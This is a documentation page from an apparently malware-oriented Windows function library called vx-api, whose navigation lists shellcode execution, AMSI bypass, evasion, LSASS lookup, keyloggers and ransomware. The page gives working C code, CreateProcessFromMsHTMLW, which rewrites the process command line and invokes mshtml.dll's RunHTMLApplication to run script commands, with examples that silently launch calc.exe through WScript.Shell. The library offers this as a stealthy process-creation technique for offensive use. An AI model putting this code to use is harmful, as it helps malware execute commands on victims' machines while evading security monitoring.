vx-api
  • Introduction
  • Code base
    • Headers
    • CRT Recreation
      • CaplockString
      • CopyMemory
      • SecureStringCopy
      • StringCompare
      • StringConcat
      • StringCopy
      • StringLength
      • StringLocateChar
      • StringFindSubstring (unstable)
      • ByteArrayToCharArray
      • CharArrayToByteArray
      • CharStringToWCharString
      • WCharStringToCharString
      • StringTerminateStringAtChar
      • RtlInitAnsiString
      • RtlInitUnicodeString
      • ShlwapiCharStringToWCharString
      • ShlwapiWCharStringToCharString
      • Random Integer (NTDLL)
      • ConvertCharStringToInt (NTDLL)
      • ZeroMemory
        • ImplZeroMemory1
        • ImplZeroMemory2
  • String Hashing
    • Djb2
    • FowlerNollVoVariant1a
    • JenkinsOneAtATime32Bit
    • LoseLose
    • Murmur
    • Rotr32
    • Sdbm
    • SipHash
    • SuperFastHash
    • UnknownGenericHash1
  • Antidebugging Methods
    • CloseHandleOnInvalidAddress
    • IsDebuggerPresentEx
    • IsIntelHardwareBreakpointPresent
  • Library Loading
    • GetTeb
    • GetPeb
    • GetKUserSharedData
    • RtlLoadPeHeaders
    • LdrLoadGetProcedureAddress
    • GetRtlUserProcessParameters
    • ProxyRegisterWaitLoadLibrary
    • ProxyWorkItemLoadLibrary
    • Function Import Methods
      • GetProcAddress (Safe)
      • GetProcAddressDjb2
      • GetProcAddressFowlerNollVoVariant1a
      • GetProcAddressJenkinsOneAtATime32Bit
      • GetProcAddressLoseLose
      • GetProcAddressMurmur
      • GetProcAddressRotr32
      • GetProcAddressSdbm
      • GetProcAddressSipHash
      • GetProcAddressSuperFastHash
      • GetProcAddressUnknownGenericHash1
  • Error Handling
    • GetLastErrorFromTeb
    • GetLastNtStatusFromTeb
    • RtlNtStatusToDosErrorViaImport
    • Win32FromHResult
  • Fingerprinting
    • GetNumberOfLinkedDlls
    • PEB / TEB related
      • GetCurrentLocaleFromTeb
      • GetOsBuildNumberFromPeb
      • GetOsMajorVersionFromPeb
      • GetOsMinorVersionFromPeb
      • GetOsPlatformIdFromPeb
    • GetPidFromEnumProcesses
    • IsNvidiaGraphicsCardPresent
    • IsProcessRunning (simple)
  • Wrappers and Helpers
    • GetProcessHeapFromTeb
    • GetCurrentThread
    • IsPathValid
    • IsDllLoaded
    • GetFileSizeFromPath
    • IsRegistryKeyValid
    • GetCurrentProcess
    • GetCurrentProcessIdFromTeb
    • GetCurrentProcessIdFromOffset
    • ExecuteBinaryShellExecuteEx
    • GetProcessPathFromLoaderLoad
    • GetProcessPathFromUserProcessParameters
    • GetProcessBinaryNameFromHwnd
    • GetCurrentDirectoryFromUserProcessParameters
    • GetSystemWindowsDirectory
    • ImplGetModuleHandle
  • Process Creation Techniques
    • WindowsRHotKey
    • WindowsRHotKeyEx
    • IeFrameOpenUrl
    • INFSectionInstallString
    • INFSectionInstallString2
    • INFSetupCommand
    • CreateProcessFromMsHTML
    • CreateProcessFromPcwUtilW
    • ShdocVwOpenUrl
    • ShellExecRunDLL
    • UrlFileProtocolHandler
    • UrlOpenUrl
    • ZipfldrRouteCall
    • CreateProcessViaNtCreateUserProcess
    • CreateProcessWithCfGuard
  • Shellcode Execution
    • CreateThreadAndWaitForCompletion
    • CDefFolderMenu_Create2
    • CertEnumSystemStore
    • CertEnumSystemStoreLocation
    • ChooseColorW
    • ClusWorkerCreate
    • CreateTimerQueueTimer
    • CryptEnumOIDInfo
    • DSA_EnumCallback
    • EnumChildWindows
    • EnumDateFormatsW
    • EnumDesktopsW
    • EnumDesktopWindows
    • EnumDirTreeW
    • EnumDisplayMonitors
    • EnumerateLoadedModules64
    • EnumFontFamiliesExW
    • EnumFontsW
    • EnumLanguageGroupLocalesW
    • EnumObjects
    • EnumPwrSchemes
    • EnumResourceTypesExW
    • EnumSystemCodePagesW
    • EnumSystemGeoID
    • EnumSystemLanguageGroupsW
    • EnumSystemLocalesEx
    • EnumThreadWindows
    • EnumTimeFormatsEx
    • EnumUILanguagesW
    • EnumWindows
    • EnumWindowStationsW
    • EvtSubscribe
    • FlsAlloc
    • ImageGetDigestStream
    • ImmEnumInputContext
    • InitOnceExecuteOnce
    • K32EnumPageFilesW
    • MessageBoxIndirectW
    • SymEnumProcesses
    • SymEnumSourceFilesW
    • VerifierEnumerateResource
  • Compression
    • Lempel-Ziv
      • LzStandardDecompressBuffer
      • LzStandardCompressBuffer
      • LzMaximumDecompressBuffer
      • LzMaximumCompressBuffer
    • Xpress
      • XpressMaximumCompressBuffer
      • XpressMaximumDecompressBuffer
      • XpressStandardCompressBuffer
      • XpressStandardDecompressBuffer
    • Xpress Huff
      • XpressHuffMaximumCompressBuffer
      • XpressHuffMaximumDecompressBuffer
      • XpressHuffStandardCompressBuffer
      • XpressHuffStandardDecompressBuffer
  • Networking
    • IPv4IpAddressStructureToString
    • IPv4IpAddressUnsignedLongToString
    • IPv4StringToUnsignedLong
    • DnsGetDomainNameIPv4AddressAsString
    • DnsGetDomainNameIPv4AddressUnsignedLong
    • GetDomainNameFromIPV4AddressAsString
    • GetDomainNameFromUnsignedLongIPV4Address
    • SendIcmpEchoMessageToIPv4Host
    • UrlDownloadToFileSynchronous
  • Lsass Related
    • GetLsaPidFromNamedPipe
    • GetLsaPidFromRegistry
    • GetLsaPidFromServiceManager
  • Proxied Functions
    • CopyFileViaSetupCopyFile
    • CreateFileFromDsCopyFromSharedFile
    • DeleteDirectoryAndSubData
    • IeCreateDirectory
    • IeCreateFile
    • IsProcessRunningAsAdmin2
    • IEGetFileAttributesEx
    • IEMoveFileEx
    • IERemoveDirectory
  • Evasion
    • AmsiBypass by Patching (OLD)
    • Delay execution until monitor off
    • Unlink DLL from process
    • Sleep Obfuscation (unstable)
  • Component Object Model
    • Process Creation
      • IHxInteractiveUser
      • WmiWin32_CreateProcess
      • IHxHelpPaneServer
      • CoShellWindowExecute
      • CoShellExecute
    • IsComInitialized
    • CoGetEnvironmentVariableW
    • CoCreateIsoForMounting
    • CoXMLHTTPDownloadByteFileW
    • CoEnumUPnPDevices
  • My Projects
    • "Jeff", COM-only keylogger
    • "Russian Doll", Recursive file loader
    • "Branchy", Branchless keylogger
    • "Fever Dream" - Code executing when the Windows machine is locked
    • Creating "Ransomware" Using WinRT
Powered by GitBook
On this page
  1. Process Creation Techniques

CreateProcessFromMsHTML

No ANSI version of this function was created. If you want to execute an ANSI command, you'll need to transform a CHAR to a WCHAR.

Examples:
CreateProcessFromMsHTMLW(L"vbscript:CreateObject(\"WScript.Shell\").Run(\"calc.exe\",0)(Window.Close)")
CreateProcessFromMsHTMLW(L"\"javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))\"");
BOOL CreateProcessFromMsHTMLW(_In_ LPCWSTR MshtaCommand)
{
	typedef HRESULT(WINAPI* RUNHTMLAPPLICATION)(HINSTANCE, HINSTANCE, LPSTR, INT);
	RUNHTMLAPPLICATION RunHtmlApplication = NULL;
	HMODULE hMod = NULL;
	WCHAR wBinaryBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
	WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2] = { 0 };
	BOOL bFlag = FALSE;

	if (GetProcessPathFromLoaderLoadModuleW(MAX_PATH * sizeof(WCHAR), wBinaryBuffer) == 0)
		goto EXIT_ROUTINE;

	StringConcatW(Payload, L"\"");
	StringConcatW(Payload, wBinaryBuffer);
	StringConcatW(Payload, L"\"");
	StringConcatW(Payload, L" ");
	StringConcatW(Payload, MshtaCommand);

	if (!RtlSetBaseUnicodeCommandLine(Payload))
		goto EXIT_ROUTINE;

	hMod = LoadLibraryW(L"mshtml.dll");
	if (hMod == NULL)
		goto EXIT_ROUTINE;

	RunHtmlApplication = (RUNHTMLAPPLICATION)GetProcAddress(hMod, "RunHTMLApplication");
	if (!RunHtmlApplication)
		goto EXIT_ROUTINE;

	RunHtmlApplication(NULL, NULL, NULL, 0);

	bFlag = TRUE;

EXIT_ROUTINE:

	return bFlag;
}

PreviousINFSetupCommandNextCreateProcessFromPcwUtilW

Last updated 29 days ago